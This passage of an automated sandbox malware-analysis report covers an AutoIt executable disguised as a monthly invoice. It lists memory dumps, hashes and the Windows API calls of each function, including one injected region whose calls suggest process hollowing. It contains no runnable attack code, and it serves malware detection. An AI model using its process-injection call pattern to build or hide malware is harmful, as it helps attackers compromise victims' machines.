                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                          • API String ID: 1765576173-1499432010
                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1794320848-0
                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentTerminate
                                                          • String ID:
                                                          • API String ID: 2429186680-0
                                                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                          APIs
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_
                                                          • String ID:
                                                          • API String ID: 1144537725-0
                                                          • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                          • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                          • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                          • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                          APIs
                                                          • _malloc.LIBCMT ref: 0043214B
                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                          • _malloc.LIBCMT ref: 0043215D
                                                          • _malloc.LIBCMT ref: 0043216F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _malloc$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 680241177-0
                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                          APIs
                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 4217535847-0
                                                          • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                          • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                          • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                          • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                          • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                          • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                          • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                          • String ID:
                                                          • API String ID: 4163294574-0
                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                          APIs
                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                          • _strcat.LIBCMT ref: 0040F786
                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                          • String ID:
                                                          • API String ID: 3199840319-0
                                                          • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                          • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FreeInfoLibraryParametersSystem
                                                          • String ID:
                                                          • API String ID: 3403648963-0
                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                          APIs
                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00415012
                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2999321469-0
                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04119A63
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04119AF9
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04119B1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1741008117.0000000004118000.00000040.00000020.00020000.00000000.sdmp, Offset: 04118000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4118000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                          • Instruction ID: 6ec7a37200a15d500464654195404d7c533d73db3b2c9f76671d9cc5bf852048
                                                          • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                          • Instruction Fuzzy Hash: 8112CF24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                          • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                          • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                          • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                          • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                          APIs
                                                          Memory Dump Source
